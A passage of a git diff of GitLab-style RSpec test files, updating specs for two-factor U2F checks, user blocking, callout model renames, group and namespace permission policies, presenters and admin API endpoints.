U2F.urlsafe_encode64(device.key_handle_raw), + public_key: Base64.strict_encode64(device.origin_public_key_raw)) + + expect(user.two_factor_u2f_enabled?).to eq(false) + end + end + end + + context 'when webauthn feature flag is disabled' do + before do + stub_feature_flags(webauthn: false) + end + + context 'user has no U2F registration' do + it { expect(user.two_factor_u2f_enabled?).to eq(false) } + end + + context 'user has existing U2F registration' do + it 'returns true' do + device = U2F::FakeU2F.new(FFaker::BaconIpsum.characters(5)) + create(:u2f_registration, name: 'my u2f device', + user: user, + certificate: Base64.strict_encode64(device.cert_raw), + key_handle: U2F.urlsafe_encode64(device.key_handle_raw), + public_key: Base64.strict_encode64(device.origin_public_key_raw)) + + expect(user.two_factor_u2f_enabled?).to eq(true) + end + end + end + end + describe 'projects' do before do @user = create(:user) @@ -1856,15 +1956,31 @@ RSpec.describe User do end context 'when user has running CI pipelines' do - let(:service) { double } let(:pipelines) { build_list(:ci_pipeline, 3, :running) } - it 'aborts all running pipelines and related jobs' do + it 'drops all running pipelines and related jobs' do + drop_service = double + disable_service = double + expect(user).to receive(:pipelines).and_return(pipelines) - expect(Ci::DropPipelineService).to receive(:new).and_return(service) - expect(service).to receive(:execute_async_for_all).with(pipelines, :user_blocked, user) + expect(Ci::DropPipelineService).to receive(:new).and_return(drop_service) + expect(drop_service).to receive(:execute_async_for_all).with(pipelines, :user_blocked, user) - user.block + expect(Ci::DisableUserPipelineSchedulesService).to receive(:new).and_return(disable_service) + expect(disable_service).to receive(:execute).with(user) + + user.block! + end + + it 'does not drop running pipelines if the transaction rolls back' do + expect(Ci::DropPipelineService).not_to receive(:new) + expect(Ci::DisableUserPipelineSchedulesService).not_to receive(:new) + + User.transaction do + user.block + + raise ActiveRecord::Rollback + end end end @@ -2540,26 +2656,18 @@ RSpec.describe User do end describe '.find_by_full_path' do - using RSpec::Parameterized::TableSyntax - - # TODO: this `where/when` can be removed in issue https://gitlab.com/gitlab-org/gitlab/-/issues/341070 - # At that point we only need to check `user_namespace` - where(namespace_type: [:namespace, :user_namespace]) + let!(:user) { create(:user, namespace: create(:user_namespace)) } - with_them do - let!(:user) { create(:user, namespace: create(namespace_type)) } - - context 'with a route matching the given path' do - let!(:route) { user.namespace.route } + context 'with a route matching the given path' do + let!(:route) { user.namespace.route } - it 'returns the user' do - expect(described_class.find_by_full_path(route.path)).to eq(user) - end + it 'returns the user' do + expect(described_class.find_by_full_path(route.path)).to eq(user) + end - it 'is case-insensitive' do - expect(described_class.find_by_full_path(route.path.upcase)).to eq(user) - expect(described_class.find_by_full_path(route.path.downcase)).to eq(user) - end + it 'is case-insensitive' do + expect(described_class.find_by_full_path(route.path.upcase)).to eq(user) + expect(described_class.find_by_full_path(route.path.downcase)).to eq(user) end context 'with a redirect route matching the given path' do @@ -3463,19 +3571,7 @@ RSpec.describe User do subject { user.membership_groups } - shared_examples 'returns groups where the user is a member' do - specify { is_expected.to contain_exactly(parent_group, child_group) } - end - - it_behaves_like 'returns groups where the user is a member' - - context 'when feature flag :linear_user_membership_groups is disabled' do - before do - stub_feature_flags(linear_user_membership_groups: false) - end - - it_behaves_like 'returns groups where the user is a member' - end + specify { is_expected.to contain_exactly(parent_group, child_group) } end describe '#authorizations_for_projects' do @@ -5543,7 +5639,7 @@ RSpec.describe User do describe '#dismissed_callout?' do let_it_be(:user, refind: true) { create(:user) } - let_it_be(:feature_name) { UserCallout.feature_names.each_key.first } + let_it_be(:feature_name) { Users::Callout.feature_names.each_key.first } context 'when no callout dismissal record exists' do it 'returns false when no ignore_dismissal_earlier_than provided' do @@ -5553,7 +5649,7 @@ RSpec.describe User do context 'when dismissed callout exists' do before_all do - create(:user_callout, user: user, feature_name: feature_name, dismissed_at: 4.months.ago) + create(:callout, user: user, feature_name: feature_name, dismissed_at: 4.months.ago) end it 'returns true when no ignore_dismissal_earlier_than provided' do @@ -5572,12 +5668,12 @@ RSpec.describe User do describe '#find_or_initialize_callout' do let_it_be(:user, refind: true) { create(:user) } - let_it_be(:feature_name) { UserCallout.feature_names.each_key.first } + let_it_be(:feature_name) { Users::Callout.feature_names.each_key.first } subject(:find_or_initialize_callout) { user.find_or_initialize_callout(feature_name) } context 'when callout exists' do - let!(:callout) { create(:user_callout, user: user, feature_name: feature_name) } + let!(:callout) { create(:callout, user: user, feature_name: feature_name) } it 'returns existing callout' do expect(find_or_initialize_callout).to eq(callout) @@ -5587,7 +5683,7 @@ RSpec.describe User do context 'when callout does not exist' do context 'when feature name is valid' do it 'initializes a new callout' do - expect(find_or_initialize_callout).to be_a_new(UserCallout) + expect(find_or_initialize_callout).to be_a_new(Users::Callout) end it 'is valid' do @@ -5599,7 +5695,7 @@ RSpec.describe User do let(:feature_name) { 'notvalid' } it 'initializes a new callout' do - expect(find_or_initialize_callout).to be_a_new(UserCallout) + expect(find_or_initialize_callout).to be_a_new(Users::Callout) end it 'is not valid' do @@ -6092,20 +6188,6 @@ RSpec.describe User do end end - describe '#default_dashboard?' do - it 'is the default dashboard' do - user = build(:user) - - expect(user.default_dashboard?).to be true - end - - it 'is not the default dashboard' do - user = build(:user, dashboard: 'stars') - - expect(user.default_dashboard?).to be false - end - end - describe '.dormant' do it 'returns dormant users' do freeze_time do @@ -6218,19 +6300,7 @@ RSpec.describe User do subject { user.send(:groups_with_developer_maintainer_project_access) } - shared_examples 'groups_with_developer_maintainer_project_access examples' do - specify { is_expected.to contain_exactly(developer_group2) } - end - - it_behaves_like 'groups_with_developer_maintainer_project_access examples' - - context 'when feature flag :linear_user_groups_with_developer_maintainer_project_access is disabled' do - before do - stub_feature_flags(linear_user_groups_with_developer_maintainer_project_access: false) - end - - it_behaves_like 'groups_with_developer_maintainer_project_access examples' - end + specify { is_expected.to contain_exactly(developer_group2) } end describe '.get_ids_by_username' do @@ -6269,4 +6339,8 @@ RSpec.describe User do expect(user.user_readme).to be(nil) end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :user } + end end diff --git a/spec/models/user_callout_spec.rb b/spec/models/users/callout_spec.rb index 5b36c8450ea..293f0279e79 100644 --- a/spec/models/user_callout_spec.rb +++ b/spec/models/users/callout_spec.rb @@ -2,8 +2,8 @@ require 'spec_helper' -RSpec.describe UserCallout do - let_it_be(:callout) { create(:user_callout) } +RSpec.describe Users::Callout do + let_it_be(:callout) { create(:callout) } it_behaves_like 'having unique enum values' diff --git a/spec/models/concerns/calloutable_spec.rb b/spec/models/users/calloutable_spec.rb index d847413de88..01603d8bbd6 100644 --- a/spec/models/concerns/calloutable_spec.rb +++ b/spec/models/users/calloutable_spec.rb @@ -2,8 +2,8 @@ require 'spec_helper' -RSpec.describe Calloutable do - subject { build(:user_callout) } +RSpec.describe Users::Calloutable do + subject { build(:callout) } describe "Associations" do it { is_expected.to belong_to(:user) } @@ -14,9 +14,9 @@ RSpec.describe Calloutable do end describe '#dismissed_after?' do - let(:some_feature_name) { UserCallout.feature_names.keys.second } - let(:callout_dismissed_month_ago) { create(:user_callout, feature_name: some_feature_name, dismissed_at: 1.month.ago )} - let(:callout_dismissed_day_ago) { create(:user_callout, feature_name: some_feature_name, dismissed_at: 1.day.ago )} + let(:some_feature_name) { Users::Callout.feature_names.keys.second } + let(:callout_dismissed_month_ago) { create(:callout, feature_name: some_feature_name, dismissed_at: 1.month.ago )} + let(:callout_dismissed_day_ago) { create(:callout, feature_name: some_feature_name, dismissed_at: 1.day.ago )} it 'returns whether a callout dismissed after specified date' do expect(callout_dismissed_month_ago.dismissed_after?(15.days.ago)).to eq(false) diff --git a/spec/models/work_item/type_spec.rb b/spec/models/work_item/type_spec.rb index dd5324d63a0..cc18558975b 100644 --- a/spec/models/work_item/type_spec.rb +++ b/spec/models/work_item/type_spec.rb @@ -19,10 +19,10 @@ RSpec.describe WorkItem::Type do it 'deletes type but not unrelated issues' do type = create(:work_item_type) - expect(WorkItem::Type.count).to eq(5) + expect(WorkItem::Type.count).to eq(6) expect { type.destroy! }.not_to change(Issue, :count) - expect(WorkItem::Type.count).to eq(4) + expect(WorkItem::Type.count).to eq(5) end end diff --git a/spec/policies/clusters/agents/activity_event_policy_spec.rb b/spec/policies/clusters/agents/activity_event_policy_spec.rb new file mode 100644 index 00000000000..1262fcfd9f2 --- /dev/null +++ b/spec/policies/clusters/agents/activity_event_policy_spec.rb @@ -0,0 +1,31 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Clusters::Agents::ActivityEventPolicy do + let_it_be(:event) { create(:agent_activity_event) } + + let(:user) { create(:user) } + let(:policy) { described_class.new(user, event) } + let(:project) { event.agent.project } + + describe 'rules' do + context 'developer' do + before do + project.add_developer(user) + end + + it { expect(policy).to be_disallowed :admin_cluster } + it { expect(policy).to be_disallowed :read_cluster } + end + + context 'maintainer' do + before do + project.add_maintainer(user) + end + + it { expect(policy).to be_allowed :admin_cluster } + it { expect(policy).to be_allowed :read_cluster } + end + end +end diff --git a/spec/policies/group_policy_spec.rb b/spec/policies/group_policy_spec.rb index fc4fbace790..7822ee2b92e 100644 --- a/spec/policies/group_policy_spec.rb +++ b/spec/policies/group_policy_spec.rb @@ -1033,6 +1033,86 @@ RSpec.describe GroupPolicy do end end + describe 'register_group_runners' do + shared_examples 'expected outcome based on runner registration control' do + context 'with runner_registration_control FF disabled' do + before do + stub_feature_flags(runner_registration_control: false) + end + + it { is_expected.to be_allowed(:register_group_runners) } + end + + context 'with runner_registration_control FF enabled' do + before do + stub_feature_flags(runner_registration_control: true) + end + + context 'with group runner registration disabled' do + before do + stub_application_setting(valid_runner_registrars: ['project']) + end + + it { is_expected.to be_disallowed(:register_group_runners) } + end + end + end + + context 'admin' do + let(:current_user) { admin } + + context 'when admin mode is enabled', :enable_admin_mode do + it { is_expected.to be_allowed(:register_group_runners) } + + it_behaves_like 'expected outcome based on runner registration control' + end + + context 'when admin mode is disabled' do + it { is_expected.to be_disallowed(:register_group_runners) } + end + end + + context 'with owner' do + let(:current_user) { owner } + + it { is_expected.to be_allowed(:register_group_runners) } + + it_behaves_like 'expected outcome based on runner registration control' + end + + context 'with maintainer' do + let(:current_user) { maintainer } + + it { is_expected.to be_allowed(:register_group_runners) } + + it_behaves_like 'expected outcome based on runner registration control' + end + + context 'with reporter' do + let(:current_user) { reporter } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + + context 'with guest' do + let(:current_user) { guest } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + + context 'with non member' do + let(:current_user) { create(:user) } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + + context 'with anonymous' do + let(:current_user) { nil } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + end + context 'with customer_relations feature flag disabled' do let(:current_user) { owner } diff --git a/spec/policies/namespaces/project_namespace_policy_spec.rb b/spec/policies/namespaces/project_namespace_policy_spec.rb index 5bb38deb498..f6fe4ae552a 100644 --- a/spec/policies/namespaces/project_namespace_policy_spec.rb +++ b/spec/policies/namespaces/project_namespace_policy_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe NamespacePolicy do +RSpec.describe Namespaces::ProjectNamespacePolicy do let_it_be(:parent) { create(:namespace) } let_it_be(:project) { create(:project, namespace: parent) } let_it_be(:namespace) { project.project_namespace } @@ -37,7 +37,7 @@ RSpec.describe NamespacePolicy do let_it_be(:current_user) { create(:admin) } context 'when admin mode is enabled', :enable_admin_mode do - it { is_expected.to be_allowed(*permissions) } + it { is_expected.to be_disallowed(*permissions) } end context 'when admin mode is disabled' do diff --git a/spec/policies/namespaces/user_namespace_policy_spec.rb b/spec/policies/namespaces/user_namespace_policy_spec.rb index 02eda31bfa7..06db2f6e243 100644 --- a/spec/policies/namespaces/user_namespace_policy_spec.rb +++ b/spec/policies/namespaces/user_namespace_policy_spec.rb @@ -3,10 +3,10 @@ require 'spec_helper' RSpec.describe Namespaces::UserNamespacePolicy do - let(:user) { create(:user) } - let(:owner) { create(:user) } - let(:admin) { create(:admin) } - let(:namespace) { create(:namespace, owner: owner) } + let_it_be(:user) { create(:user) } + let_it_be(:owner) { create(:user) } + let_it_be(:admin) { create(:admin) } + let_it_be(:namespace) { create(:user_namespace, owner: owner) } let(:owner_permissions) { [:owner_access, :create_projects, :admin_namespace, :read_namespace, :read_statistics, :transfer_projects, :create_package_settings, :read_package_settings] } @@ -74,4 +74,26 @@ RSpec.describe Namespaces::UserNamespacePolicy do it { is_expected.to be_disallowed(:create_jira_connect_subscription) } end end + + describe 'create projects' do + using RSpec::Parameterized::TableSyntax + + let(:current_user) { owner } + + context 'when user can create projects' do + before do + allow(current_user).to receive(:can_create_project?).and_return(true) + end + + it { is_expected.to be_allowed(:create_projects) } + end + + context 'when user cannot create projects' do + before do + allow(current_user).to receive(:can_create_project?).and_return(false) + end + + it { is_expected.to be_disallowed(:create_projects) } + end + end end diff --git a/spec/presenters/blob_presenter_spec.rb b/spec/presenters/blob_presenter_spec.rb index 28e18708eab..8c0347b3c8d 100644 --- a/spec/presenters/blob_presenter_spec.rb +++ b/spec/presenters/blob_presenter_spec.rb @@ -31,6 +31,28 @@ RSpec.describe BlobPresenter do it { expect(presenter.replace_path).to eq("/#{project.full_path}/-/create/#{blob.commit_id}/#{blob.path}") } end + describe '#can_current_user_push_to_branch' do + let(:branch_exists) { true } + + before do + allow(project.repository).to receive(:branch_exists?).with(blob.commit_id).and_return(branch_exists) + end + + it { expect(presenter.can_current_user_push_to_branch?).to eq(true) } + + context 'current_user is nil' do + let(:user) { nil } + + it { expect(presenter.can_current_user_push_to_branch?).to eq(false) } + end + + context 'branch does not exist' do + let(:branch_exists) { false } + + it { expect(presenter.can_current_user_push_to_branch?).to eq(false) } + end + end + describe '#pipeline_editor_path' do context 'when blob is .gitlab-ci.yml' do before do @@ -45,6 +67,10 @@ RSpec.describe BlobPresenter do end end + describe '#code_owners' do + it { expect(presenter.code_owners).to match_array([]) } + end + describe '#ide_edit_path' do it { expect(presenter.ide_edit_path).to eq("/-/ide/project/#{project.full_path}/edit/HEAD/-/files/ruby/regex.rb") } end @@ -133,27 +159,25 @@ RSpec.describe BlobPresenter do presenter.highlight end end - end - describe '#highlight_transformed' do context 'when blob is ipynb' do let(:blob) { repository.blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') } let(:git_blob) { blob.__getobj__ } before do - allow(git_blob).to receive(:transformed_for_diff).and_return(true) + allow(Gitlab::Diff::CustomDiff).to receive(:transformed_for_diff?).and_return(true) end it 'uses md as the transformed language' do expect(Gitlab::Highlight).to receive(:highlight).with('files/ipython/markdown-table.ipynb', anything, plain: nil, language: 'md') - presenter.highlight_transformed + presenter.highlight end it 'transforms the blob' do expect(Gitlab::Highlight).to receive(:highlight).with('files/ipython/markdown-table.ipynb', include("%%"), plain: nil, language: 'md') - presenter.highlight_transformed + presenter.highlight end end @@ -171,7 +195,7 @@ RSpec.describe BlobPresenter do it 'does not transform the file' do expect(Gitlab::Highlight).to receive(:highlight).with('files/ruby/regex.rb', git_blob.data, plain: nil, language: 'ruby') - presenter.highlight_transformed + presenter.highlight end end end diff --git a/spec/presenters/ci/pipeline_presenter_spec.rb b/spec/presenters/ci/pipeline_presenter_spec.rb index 2d3c0d85eda..a278d4dad83 100644 --- a/spec/presenters/ci/pipeline_presenter_spec.rb +++ b/spec/presenters/ci/pipeline_presenter_spec.rb @@ -122,6 +122,30 @@ RSpec.describe Ci::PipelinePresenter do end end + describe '#coverage' do + subject { presenter.coverage } + + context 'when pipeline has coverage' do + before do + allow(pipeline).to receive(:coverage).and_return(35.0) + end + + it 'formats coverage into 2 decimal points' do + expect(subject).to eq('35.00') + end + end + + context 'when pipeline does not have coverage' do + before do + allow(pipeline).to receive(:coverage).and_return(nil) + end + + it 'returns nil' do + expect(subject).to be_nil + end + end + end + describe '#ref_text' do subject { presenter.ref_text } diff --git a/spec/presenters/merge_request_presenter_spec.rb b/spec/presenters/merge_request_presenter_spec.rb index b3ec184d08c..60296cca058 100644 --- a/spec/presenters/merge_request_presenter_spec.rb +++ b/spec/presenters/merge_request_presenter_spec.rb @@ -632,4 +632,28 @@ RSpec.describe MergeRequestPresenter do it { is_expected.to eq(expose_path("/api/v4/projects/#{project.id}/merge_requests/#{resource.iid}/unapprove")) } end + + describe '#pipeline_coverage_delta' do + subject { described_class.new(resource, current_user: user).pipeline_coverage_delta } + + context 'when merge request has pipeline coverage delta' do + before do + allow(resource).to receive(:pipeline_coverage_delta).and_return(35.0) + end + + it 'formats coverage into 2 decimal points' do + expect(subject).to eq('35.00') + end + end + + context 'when merge request does not have pipeline coverage delta' do + before do + allow(resource).to receive(:pipeline_coverage_delta).and_return(nil) + end + + it 'returns nil' do + expect(subject).to be_nil + end + end + end end diff --git a/spec/presenters/packages/npm/package_presenter_spec.rb b/spec/presenters/packages/npm/package_presenter_spec.rb index 49046492ab4..3b6dfcd20b8 100644 --- a/spec/presenters/packages/npm/package_presenter_spec.rb +++ b/spec/presenters/packages/npm/package_presenter_spec.rb @@ -32,22 +32,15 @@ RSpec.describe ::Packages::Npm::PackagePresenter do } end - let(:presenter) { described_class.new(package_name, packages, include_metadata: include_metadata) } + let(:presenter) { described_class.new(package_name, packages) } subject { presenter.versions } - where(:has_dependencies, :has_metadatum, :include_metadata) do - true | true | true - false | true | true - true | false | true - false | false | true - - # TODO : to remove along with packages_npm_abbreviated_metadata - # See https://gitlab.com/gitlab-org/gitlab/-/issues/344827 - true | true | false - false | true | false - true | false | false - false | false | false + where(:has_dependencies, :has_metadatum) do + true | true + false | true + true | false + false | false end with_them do @@ -80,7 +73,7 @@ RSpec.describe ::Packages::Npm::PackagePresenter do context 'metadatum' do ::Packages::Npm::PackagePresenter::PACKAGE_JSON_ALLOWED_FIELDS.each do |metadata_field| - if params[:has_metadatum] && params[:include_metadata] + if params[:has_metadatum] it { expect(subject.dig(package1.version, metadata_field)).not_to be nil } else it { expect(subject.dig(package1.version, metadata_field)).to be nil } diff --git a/spec/presenters/projects/security/configuration_presenter_spec.rb b/spec/presenters/projects/security/configuration_presenter_spec.rb new file mode 100644 index 00000000000..836753d0483 --- /dev/null +++ b/spec/presenters/projects/security/configuration_presenter_spec.rb @@ -0,0 +1,301 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Projects::Security::ConfigurationPresenter do + include Gitlab::Routing.url_helpers + using RSpec::Parameterized::TableSyntax + + let(:project_with_repo) { create(:project, :repository) } + let(:project_with_no_repo) { create(:project) } + let(:current_user) { create(:user) } + let(:presenter) { described_class.new(project, current_user: current_user) } + + before do + stub_licensed_features(licensed_scan_types.to_h { |type| [type, true] }) + + stub_feature_flags(corpus_management: false) + end + + describe '#to_html_data_attribute' do + subject(:html_data) { presenter.to_html_data_attribute } + + context 'when latest default branch pipeline`s source is not auto devops' do + let(:project) { project_with_repo } + + let(:pipeline) do + create( + :ci_pipeline, + project: project, + ref: project.default_branch, + sha: project.commit.sha + ) + end + + let!(:build_sast) { create(:ci_build, :sast, pipeline: pipeline) } + let!(:build_dast) { create(:ci_build, :dast, pipeline: pipeline) } + let!(:build_license_scanning) { create(:ci_build, :license_scanning, pipeline: pipeline) } + + it 'includes links to auto devops and secure product docs' do + expect(html_data[:auto_devops_help_page_path]).to eq(help_page_path('topics/autodevops/index')) + expect(html_data[:help_page_path]).to eq(help_page_path('user/application_security/index')) + end + + it 'returns info that Auto DevOps is not enabled' do + expect(html_data[:auto_devops_enabled]).to eq(false) + expect(html_data[:auto_devops_path]).to eq(project_settings_ci_cd_path(project, anchor: 'autodevops-settings')) + end + + it 'includes a link to the latest pipeline' do + expect(html_data[:latest_pipeline_path]).to eq(project_pipeline_path(project, pipeline)) + end + + it 'has stubs for autofix' do + expect(html_data.keys).to include(:can_toggle_auto_fix_settings, :auto_fix_enabled, :auto_fix_user_path) + end + + context "while retrieving information about user's ability to enable auto_devops" do + where(:is_admin, :archived, :feature_available, :result) do + true | true | true | false + false | true | true | false + true | false | true | true + false | false | true | false + true | true | false | false + false | true | false | false + true | false | false | false + false | false | false | false + end + + with_them do + before do + allow_next_instance_of(described_class) do |presenter| + allow(presenter).to receive(:can?).and_return(is_admin) + allow(presenter).to receive(:archived?).and_return(archived) + allow(presenter).to receive(:feature_available?).and_return(feature_available) + end + end + + it 'includes can_enable_auto_devops' do + expect(html_data[:can_enable_auto_devops]).to eq(result) + end + end + end + + it 'includes feature information' do + feature = Gitlab::Json.parse(html_data[:features]).find { |scan| scan['type'] == 'sast' } + + expect(feature['type']).to eq('sast') + expect(feature['configured']).to eq(true) + expect(feature['configuration_path']).to eq(project_security_configuration_sast_path(project)) + expect(feature['available']).to eq(true) + end + + context 'when checking features configured status' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + where(:type, :configured) do + :dast | true + :dast_profiles | true + :sast | true + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | true + :secret_detection | false + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'returns proper configuration status' do + feature = features.find { |scan| scan['type'] == type.to_s } + + expect(feature['configured']).to eq(configured) + end + end + end + + context 'when the job has more than one report' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + let!(:artifacts) do + { artifacts: { reports: { other_job: ['gl-other-report.json'], sast: ['gl-sast-report.json'] } } } + end + + let!(:complicated_job) { build_stubbed(:ci_build, options: artifacts) } + + before do + allow_next_instance_of(::Security::SecurityJobsFinder) do |finder| + allow(finder).to receive(:execute).and_return([complicated_job]) + end + end + + where(:type, :configured) do + :dast | false + :dast_profiles | true + :sast | true + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | true + :secret_detection | false + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'properly detects security jobs' do + feature = features.find { |scan| scan['type'] == type.to_s } + + expect(feature['configured']).to eq(configured) + end + end + end + + it 'includes a link to the latest pipeline' do + expect(subject[:latest_pipeline_path]).to eq(project_pipeline_path(project, pipeline)) + end + + context "while retrieving information about gitlab ci file" do + context 'when a .gitlab-ci.yml file exists' do + let!(:ci_config) do + project.repository.create_file( + project.creator, + Gitlab::FileDetector::PATTERNS[:gitlab_ci], + 'contents go here', + message: 'test', + branch_name: 'master') + end + + it 'expects gitlab_ci_present to be true' do + expect(html_data[:gitlab_ci_present]).to eq(true) + end + end + + context 'when a .gitlab-ci.yml file does not exist' do + it 'expects gitlab_ci_present to be false if the file is not present' do + expect(html_data[:gitlab_ci_present]).to eq(false) + end + end + end + + it 'includes the path to gitlab_ci history' do + expect(subject[:gitlab_ci_history_path]).to eq(project_blame_path(project, 'master/.gitlab-ci.yml')) + end + end + + context 'when the project is empty' do + let(:project) { project_with_no_repo } + + it 'includes a blank gitlab_ci history path' do + expect(html_data[:gitlab_ci_history_path]).to eq('') + end + end + + context 'when the project has no default branch set' do + let(:project) { project_with_repo } + + it 'includes the path to gitlab_ci history' do + allow(project).to receive(:default_branch).and_return(nil) + + expect(html_data[:gitlab_ci_history_path]).to eq(project_blame_path(project, 'master/.gitlab-ci.yml')) + end + end + + context "when the latest default branch pipeline's source is auto devops" do + let(:project) { project_with_repo } + + let(:pipeline) do + create( + :ci_pipeline, + :auto_devops_source, + project: project, + ref: project.default_branch, + sha: project.commit.sha + ) + end + + let!(:build_sast) { create(:ci_build, :sast, pipeline: pipeline, status: 'success') } + let!(:build_dast) { create(:ci_build, :dast, pipeline: pipeline, status: 'success') } + let!(:ci_build) { create(:ci_build, :secret_detection, pipeline: pipeline, status: 'pending') } + + it 'reports that auto devops is enabled' do + expect(html_data[:auto_devops_enabled]).to be_truthy + end + + context 'when gathering feature data' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + where(:type, :configured) do + :dast | true + :dast_profiles | true + :sast | true + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | false + :secret_detection | true + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'reports that all scanners are configured for which latest pipeline has builds' do + feature = features.find { |scan| scan['type'] == type.to_s } + + expect(feature['configured']).to eq(configured) + end + end + end + end + + context 'when the project has no default branch pipeline' do + let(:project) { project_with_repo } + + it 'reports that auto devops is disabled' do + expect(html_data[:auto_devops_enabled]).to be_falsy + end + + it 'includes a link to CI pipeline docs' do + expect(html_data[:latest_pipeline_path]).to eq(help_page_path('ci/pipelines')) + end + + context 'when gathering feature data' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + where(:type, :configured) do + :dast | false + :dast_profiles | true + :sast | false + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | false + :secret_detection | false + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'reports all security jobs as unconfigured with exception of "fake" jobs' do + feature = features.find { |scan| scan['type'] == type.to_s } + + expect(feature['configured']).to eq(configured) + end + end + end + end + + def licensed_scan_types + ::Security::SecurityJobsFinder.allowed_job_types + ::Security::LicenseComplianceJobsFinder.allowed_job_types - [:cluster_image_scanning] + end + end +end diff --git a/spec/requests/admin/integrations_controller_spec.rb b/spec/requests/admin/integrations_controller_spec.rb new file mode 100644 index 00000000000..cfb40063095 --- /dev/null +++ b/spec/requests/admin/integrations_controller_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Admin::IntegrationsController, :enable_admin_mode do + let_it_be(:admin) { create(:admin) } + + before do + sign_in(admin) + end + + describe 'GET #overrides' do + let_it_be(:integration) { create(:jira_integration, :instance) } + let_it_be(:overridden_integration) { create(:jira_integration) } + let_it_be(:overridden_other_integration) { create(:confluence_integration) } + + let(:overrides_path) { overrides_admin_application_settings_integration_path(integration, format: format) } + + context 'format html' do + let(:format) { :html } + + it 'renders' do + get overrides_path + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template('shared/integrations/overrides') + end + end + + context 'format json' do + let(:format) { :json } + let(:project) { overridden_integration.project } + + it 'returns the project overrides data' do + get overrides_path + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to include_pagination_headers + expect(json_response).to contain_exactly( + { + 'avatar_url' => project.avatar_url, + 'full_name' => project.full_name, + 'name' => project.name, + 'full_path' => project_path(project) + } + ) + end + end + end +end diff --git a/spec/requests/admin/version_check_controller_spec.rb b/spec/requests/admin/version_check_controller_spec.rb new file mode 100644 index 00000000000..7e2f33d5bc5 --- /dev/null +++ b/spec/requests/admin/version_check_controller_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Admin::VersionCheckController, :enable_admin_mode do + let(:admin) { create(:admin) } + + before do + sign_in(admin) + end + + describe 'GET #version_check' do + context 'when VersionCheck.response is nil' do + before do + allow_next_instance_of(VersionCheck) do |instance| + allow(instance).to receive(:response).and_return(nil) + end + get admin_version_check_path + end + + it 'returns nil' do + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to be_nil + end + + it 'sets no-cache headers' do + expect(response.headers['Cache-Control']).to eq('max-age=0, private, must-revalidate') + end + end + + context 'when VersionCheck.response is valid' do + before do + allow_next_instance_of(VersionCheck) do |instance| + allow(instance).to receive(:response).and_return({ "severity" => "success" }) + end + + get admin_version_check_path + end + + it 'returns the valid data' do + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ "severity" => "success" }) + end + + it 'sets proper cache headers' do + expect(response.headers['Cache-Control']).to eq('max-age=60, private') + end + end + end +end diff --git a/spec/requests/api/admin/plan_limits_spec.rb b/spec/requests/api/admin/plan_limits_spec.rb index f497227789a..03642ad617e 100644 --- a/spec/requests/api/admin/plan_limits_spec.rb +++ b/spec/requests/api/admin/plan_limits_spec.rb @@ -25,6 +25,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response).to be_an Hash expect(json_response['conan_max_file_size']).to eq(Plan.default.actual_limits.conan_max_file_size) expect(json_response['generic_packages_max_file_size']).to eq(Plan.default.actual_limits.generic_packages_max_file_size) + expect(json_response['helm_max_file_size']).to eq(Plan.default.actual_limits.helm_max_file_size) expect(json_response['maven_max_file_size']).to eq(Plan.default.actual_limits.maven_max_file_size) expect(json_response['npm_max_file_size']).to eq(Plan.default.actual_limits.npm_max_file_size) expect(json_response['nuget_max_file_size']).to eq(Plan.default.actual_limits.nuget_max_file_size) @@ -45,6 +46,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response).to be_an Hash expect(json_response['conan_max_file_size']).to eq(Plan.default.actual_limits.conan_max_file_size) expect(json_response['generic_packages_max_file_size']).to eq(Plan.default.actual_limits.generic_packages_max_file_size) + expect(json_response['helm_max_file_size']).to eq(Plan.default.actual_limits.helm_max_file_size) expect(json_response['maven_max_file_size']).to eq(Plan.default.actual_limits.maven_max_file_size) expect(json_response['npm_max_file_size']).to eq(Plan.default.actual_limits.npm_max_file_size) expect(json_response['nuget_max_file_size']).to eq(Plan.default.actual_limits.nuget_max_file_size) @@ -84,6 +86,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do 'plan_name': 'default', 'conan_max_file_size': 10, 'generic_packages_max_file_size': 20, + 'helm_max_file_size': 25, 'maven_max_file_size': 30, 'npm_max_file_size': 40, 'nuget_max_file_size': 50, @@ -95,6 +98,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response).to be_an Hash expect(json_response['conan_max_file_size']).to eq(10) expect(json_response['generic_packages_max_file_size']).to eq(20) + expect(json_response['helm_max_file_size']).to eq(25) expect(json_response['maven_max_file_size']).to eq(30) expect(json_response['npm_max_file_size']).to eq(40) expect(json_response['nuget_max_file_size']).to eq(50) @@ -129,6 +133,7 @@ RSpec.describe API::Admin::PlanLimits, 